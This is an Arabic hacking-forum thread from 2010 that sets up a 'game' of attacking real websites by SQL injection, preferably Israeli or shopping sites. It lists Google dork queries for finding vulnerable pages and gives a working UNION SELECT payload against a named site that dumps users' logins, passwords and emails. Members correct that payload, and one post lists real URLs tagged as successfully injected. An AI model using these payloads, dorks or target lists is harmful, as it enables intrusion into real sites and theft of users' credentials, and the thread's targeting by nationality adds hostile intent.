:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   SQL قواعد البيانات (http://www.vbspiders.com/vb/forumdisplay.php?f=133)
-   -   لعبة اختراق المواقع SQL 1nj3ct!on (http://www.vbspiders.com/vb/showthread.php?t=40874)

SoLiTair4Ever 12-26-2010 09:11 AM
لعبة اختراق المواقع SQL 1nj3ct!on
 
http://www.g2z4.com/1/1.gif



http://img23.imageshack.us/img23/577...a93ps6ndf5.gif

و كما عودناكم بالجديد اليوم و انا جالس حاب العب و اخترق في نفس الوقت جاتني في راسي لعبة قلت اضعها للعناكب ان شاء الله تعجبكم و سميتها لعبة اختراق المواقع SQL 1nj3ct!onوهي انه ياتي العضو الثاني يضع استغلال الموقع اللي حاطه العضو اللي قبله و يضع لنا موقع آخر نستهدفه

http://img23.imageshack.us/img23/577...a93ps6ndf5.gif

الشروط
الموقع مايكون عربي الا اذا كان موقع غناء كموقع قنات غنوة
حاول ان يكون الموقع المستهدف اسرائيلي أو موقع شوبينج
لا تحطو موقع حتى تحطو استغلال الاول


و اخيرا ارجو منكم التفاعل مع الموضوع

SoLiTair4Ever 12-26-2010 09:34 AM
[align=center]و هذه بعض الكلمات للبحث عن المواقع المصابة[/align]
[align=center]

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

inurl:"id=" & intext:"Warning: mysql_fetch_array()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: is_writable()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: Unknown()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: pg_exec()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: mysql_query()

inurl:"id=" & intext:"Warning: array_merge()

inurl:"id=" & intext:"Warning: preg_match()

inurl:"id=" & intext:"Warning: ilesize()

inurl:"id=" & intext:"Warning: filesize()

inurl:"id=" & intext:"Warning: require()

[/align]

SoLiTair4Ever 12-26-2010 09:38 AM

SoLiTair4Ever 12-26-2010 10:04 AM

وصلت الى هنا



http://goo.gl/gjcdZ

agentsimo 12-26-2010 10:50 AM
السلام عليكم
فكرة رائعة
+
جاري الحقن

agentsimo 12-26-2010 10:55 AM
الحقنة الاخيرة
http://www.gestimhfr.fr/detail_annonce.php?ID=-10039 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(i d_user,0x3a,login,0x3a,mdp,0x3a,mail),17,18,19,20, 21,22,23,24,25,26,27+from+utilisateur--

SoLiTair4Ever 12-26-2010 06:04 PM
اقتباس:
المشاركة الأصلية كتبت بواسطة agentsimo (المشاركة 274049)
الحقنة الاخيرة
http://www.gestimhfr.fr/detail_annonce.php?ID=-10039 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(i d_user,0x3a,login,0x3a,mdp,0x3a,mail),17,18,19,20, 21,22,23,24,25,26,27+from+utilisateur--
نفس حقنتي وضعتها قبلك :a39:
http://goo.gl/gjcdZ

و حقنتك فيها خطأ بسيط
group_concat(i d_user,0x3a,login,0x3a,mdp,0x3a,mail)

انت تارك فراغ هنا i d_user بين حرف i و d

مازال مسار اللوحة

Saad Ghamdi 12-28-2010 01:14 AM
[align=center]يعطيك العافيه فكرة جميله
[/align]

Victors 12-28-2010 08:16 PM
أعتقد فكرة الموضوع مشابه لفكرة موضوع المشرف _darkman_

العدد (3) من غرفة الحقن

مشكور على الطرح

NeSsTa 12-29-2010 12:54 PM
[align=right][/align]مواقع مصابه في sql :P يلا نلعب
[align=center]
http://www.lcoastpress.com/journal.php?id='7

http://www.designforfun.com/display.php?id='99
http://www.spatialinformationdesignlab.org/projects.php?id='16
http://www.choices.edu/resources/detail.php?id='55 <== SQL Injection Success !
http://www.choices.edu/resources/detail.php?id='45 <== SQL Injection Success !
http://www.utahrealestateguide.org/profile_view.php?id='858
***12288;
http://www.artsmia.org/viewer/detail.php?id='5368&v='12
http://www.ebambi.com/profile_view.php?id='100000008 <== SQL Injection Success !
http://www.ebambi.com/profile_view.php?id='100000226 <== SQL Injection Success !
http://www.ebambi.com/profile_view.php?id='100000003 <== SQL Injection Success !
http://curshi.com/profile_view.php
***12288;
http://v1.filmpaylasalim.com/profile_view.php?id='418
http://www.crazybad.it/AnCeStrAlWoRld/profile_view.php?id='98

***12288;
***12288;
[/align]


الساعة الآن 07:56 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0